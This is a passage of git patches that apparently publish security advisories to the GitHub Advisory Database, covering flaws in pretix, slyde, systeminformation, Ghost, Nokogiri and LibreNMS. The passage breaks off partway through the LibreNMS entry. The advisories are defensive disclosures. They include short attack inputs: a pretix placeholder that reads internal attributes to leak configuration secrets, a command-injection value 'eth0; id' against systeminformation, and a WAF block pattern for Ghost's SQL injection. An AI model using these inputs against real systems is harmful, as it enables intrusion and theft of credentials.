"aliases": [ + "CVE-2026-2415" + ], + "summary": "pretix unsafely evaluates variables in emails", + "details": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when `{name}` is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained two security-relevant bugs:\n\n - It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as `{event.__init__.__code__.co_filename}}`. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for the email subject.\n\n - Placeholders in subjects and plain text bodies of emails were wrongfully evaluated twice. Therefore, if the first evaluation of a placeholder again contains a placeholder, this second placeholder was rendered. This allows the rendering of placeholders controlled by the ticket buyer, and therefore the exploitation of the first issue as a ticket buyer. Luckily, the only buyer-controlled placeholder available in pretix by default (that is not validated in a way that prevents the issue) is `{invoice_company}`, which is very unusual (but not impossible) to be contained in an email subject template. In addition to broadening the attack surface of the first issue, this could theoretically also leak information about an order to one of the attendees within that order. However, we also consider this scenario very unlikely under typical conditions.\n\nOut of caution, pretix recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/  file.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/RE:L/U:Red" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "pretix" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.0" + }, + { + "fixed": "2026.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "pretix" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2025.10.0" + }, + { + "fixed": "2025.10.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "pretix" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2025.9.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2415" + }, + { + "type": "WEB", + "url": "https://github.com/pretix/pretix/commit/ba11d24f8dfa4e9d8f03493e56fd8b43983fe297" + }, + { + "type": "WEB", + "url": "https://github.com/pretix/pretix/commit/c85afbc621b5f0b1afa618627c45f89323eb0154" + }, + { + "type": "WEB", + "url": "https://github.com/pretix/pretix/commit/edac35ed4c5466eb63a202575c337d117ddf1c8e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pretix/pretix" + }, + { + "type": "WEB", + "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-627" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:44:45Z", + "nvd_published_at": "2026-02-16T11:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json new file mode 100644 index 0000000000000..6d14735313222 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7h5-55jg-cq2f", + "modified": "2026-02-18T21:45:06Z", + "published": "2026-02-18T21:45:06Z", + "aliases": [ + "CVE-2026-26974" + ], + "summary": "Improper Control of Generation of Code ('Code Injection') in @tygo-van-den-hurk/slyde", + "details": "### Impact\nThis is a **remote code execution (RCE) vulnerability**. Node.js automatically imports `**/*.plugin.{js,mjs}` files including those from `node_modules`, so any malicious package with a `.plugin.js` file could execute arbitrary code when installed or required. **All projects using this loading behavior are affected**, especially those installing untrusted packages.\n\n### Patches\nThe issue has been **patched in v0.0.5**. Users should upgrade to **v0.0.5 or later** to mitigate the vulnerability.\n\n### Workarounds\n- Audit and restrict which packages are installed in `node_modules`.\n\n### References\n- [CWE-94: Improper Control of Generation of Code](https://cwe.mitre.org/data/definitions/94.html) \n- GitHub Security Advisories documentation: [https://docs.github.com/en/code-security/security-advisories](https://docs.github.com/en/code-security/security-advisories)", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@tygo-van-den-hurk/slyde" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde/security/advisories/GHSA-w7h5-55jg-cq2f" + }, + { + "type": "WEB", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde/commit/e4c215b061e44fd2ead805de34d72642a710af60" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:45:06Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json b/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json deleted file mode 100644 index dafc5f9866b7e..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-r8p8-qw9w-j9qv", - "modified": "2026-02-16T12:30:25Z", - "published": "2026-02-16T12:30:25Z", - "aliases": [ - "CVE-2026-2415" - ], - "details": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name}\n is used in an email template, it will be replaced with the buyer's \nname for the final email. This mechanism contained two security-relevant\n bugs:\n\n\n\n * \nIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for the email subject.\n\n\n\n\n * \nPlaceholders in subjects and plain text bodies of emails were \nwrongfully evaluated twice. Therefore, if the first evaluation of a \nplaceholder again contains a placeholder, this second placeholder was \nrendered. This allows the rendering of placeholders controlled by the \nticket buyer, and therefore the exploitation of the first issue as a \nticket buyer. Luckily, the only buyer-controlled placeholder available \nin pretix by default (that is not validated in a way that prevents the \nissue) is {invoice_company}, which is very unusual (but not\n impossible) to be contained in an email subject template. In addition \nto broadening the attack surface of the first issue, this could \ntheoretically also leak information about an order to one of the \nattendees within that order. However, we also consider this scenario \nvery unlikely under typical conditions.\n\n\nOut of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/  file.", - "severity": [ - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:L/U:Red" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2415" - }, - { - "type": "WEB", - "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-627" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-16T11:15:56Z" - } -} \ No newline at end of file From c14bf0f3db0a55cc372a2339268f4817b619f4b2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:51:51 +0000 Subject: [PATCH 163/215] Publish Advisories GHSA-9c88-49p5-5ggf GHSA-w52v-v783-gw97 --- .../GHSA-9c88-49p5-5ggf.json | 61 +++++++++++++++++ .../GHSA-w52v-v783-gw97.json | 65 +++++++++++++++++++ 2 files changed, 126 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json diff --git a/advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json b/advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json new file mode 100644 index 0000000000000..530dc0bbbc633 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c88-49p5-5ggf", + "modified": "2026-02-18T21:51:26Z", + "published": "2026-02-18T21:51:26Z", + "aliases": [ + "CVE-2026-26280" + ], + "summary": "Systeminformation has a Command Injection via unsanitized interface parameter in wifi.js retry path", + "details": "### Summary\nA command injection vulnerability in the `wifiNetworks()` function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path.\n\n### Details\nIn `lib/wifi.js`, the `wifiNetworks()` function sanitizes the `iface` parameter on the initial call (line 437). However, when the initial scan returns empty results, a `setTimeout` retry (lines 440-441) calls `getWifiNetworkListIw(iface)` with the **original unsanitized** `iface` value, which is passed directly to `execSync('iwlist ${iface} scan')`.\n\n### PoC\n1. Install `systeminformation@5.30.7`\n2. Call `si.wifiNetworks('eth0; id')`\n3. The first call sanitizes input, but if results are empty, the retry executes: `iwlist eth0; id scan`\n\n### Impact\nRemote Code Execution (RCE). Any application passing user-controlled input to `si.wifiNetworks()` is vulnerable to arbitrary command execution with the privileges of the Node.js process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "systeminformation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.30.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-9c88-49p5-5ggf" + }, + { + "type": "WEB", + "url": "https://github.com/sebhildebrandt/systeminformation/commit/22242aa56188f2bffcbd7d265a11e1ebb808b460" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sebhildebrandt/systeminformation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:51:26Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json new file mode 100644 index 0000000000000..74a6a2ffb3f09 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w52v-v783-gw97", + "modified": "2026-02-18T21:50:23Z", + "published": "2026-02-18T21:50:23Z", + "aliases": [ + "CVE-2026-26980" + ], + "summary": "Ghost has a SQL injection in Content API", + "details": "### Impact\n\nA SQL injection vulnerability existed in Ghost's Content API that allowed unauthenticated attackers to read arbitrary data from the database. \n\n### Vulnerable Versions\n\nThis vulnerability is present in Ghost v3.24.0 to v6.19.0.\n\n### Patches\n\nv6.19.1 contains a fix for this issue.\n\n### Workarounds\n\nThere is no application-level workaround. The Content API key is public by design, so restricting key access does not mitigate this vulnerability.\n\nAs a temporary mitigation, a reverse proxy or WAF rule can be used to block Content API requests containing `slug%3A%5B` or `slug:[` in the query string filter parameter. Note that this may break legitimate slug filter functionality.\n\n### References\n\nWe thank Nicholas Carlini using Claude, Anthropic for disclosing this vulnerability responsibly. \n\n### For more information\nIf you have any questions or comments about this advisory, email us at [security@ghost.org](mailto:security@ghost.org).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ghost" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.24.0" + }, + { + "fixed": "6.19.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97" + }, + { + "type": "WEB", + "url": "https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TryGhost/Ghost" + }, + { + "type": "WEB", + "url": "https://github.com/TryGhost/Ghost/releases/tag/v6.19.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:50:23Z", + "nvd_published_at": null + } +} \ No newline at end of file From 2f7e08e7290bcb51e4a5c7dd1b16e03e86d8e65f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:59:30 +0000 Subject: [PATCH 164/215] Publish GHSA-wx95-c6cv-8532 --- .../GHSA-wx95-c6cv-8532.json | 55 +++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json diff --git a/advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json b/advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json new file mode 100644 index 0000000000000..ddb15dfd85c75 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json @@ -0,0 +1,55 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx95-c6cv-8532", + "modified": "2026-02-18T21:57:38Z", + "published": "2026-02-18T21:57:38Z", + "aliases": [], + "summary": "Nokogiri does not check the return value from xmlC14NExecute", + "details": "## Summary\n\nNokogiri's CRuby extension fails to check the return value from `xmlC14NExecute` in the method `Nokogiri::XML::Document#canonicalize` and `Nokogiri::XML::Node#canonicalize`. When canonicalization fails, an empty string is returned instead of raising an exception. This incorrect return value may allow downstream libraries to accept invalid or incomplete canonicalized XML, which has been demonstrated to enable signature validation bypass in SAML libraries.\n\nJRuby is not affected, as the Java implementation correctly raises `RuntimeError` on canonicalization failure.\n\n## Mitigation\n\nUpgrade to Nokogiri `>= 1.19.1`.\n\n## Severity\n\nThe maintainers have assessed this as **Medium** severity. Nokogiri itself is a parsing library without a clear security boundary related to canonicalization, so the direct impact is that a method returns incorrect data on invalid input. However, this behavior was exploited in practice to bypass SAML signature validation in downstream libraries (see References).\n\n## Credit\n\nThis vulnerability was responsibly reported by HackerOne researcher `d4d`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "nokogiri" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.5.1" + }, + { + "fixed": "1.19.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-wx95-c6cv-8532" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sparklemotion/nokogiri" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-252" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:57:38Z", + "nvd_published_at": null + } +} \ No newline at end of file From 41148b5be8d4f3f61e281f3c7866bdda69576f76 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 22:08:48 +0000 Subject: [PATCH 165/215] Publish Advisories GHSA-5pqf-54qp-32wx GHSA-93fx-g747-695x GHSA-fqx6-693c-f55g GHSA-gqx7-99jw-6fpr --- .../GHSA-5pqf-54qp-32wx.json | 69 ++++++++++++++++++ .../GHSA-93fx-g747-695x.json | 69 ++++++++++++++++++ .../GHSA-fqx6-693c-f55g.json | 70 +++++++++++++++++++ .../GHSA-gqx7-99jw-6fpr.json | 69 ++++++++++++++++++ 4 files changed, 277 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json diff --git a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json new file mode 100644 index 0000000000000..39b124c867160 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pqf-54qp-32wx", + "modified": "2026-02-18T22:07:19Z", + "published": "2026-02-18T22:07:19Z", + "aliases": [ + "CVE-2026-26991" + ], + "summary": "LibreNMS /device-groups name Stored Cross-Site Scripting", + "details": "### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section('title', __('Device Groups'))\n@section('content')\n
\n\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n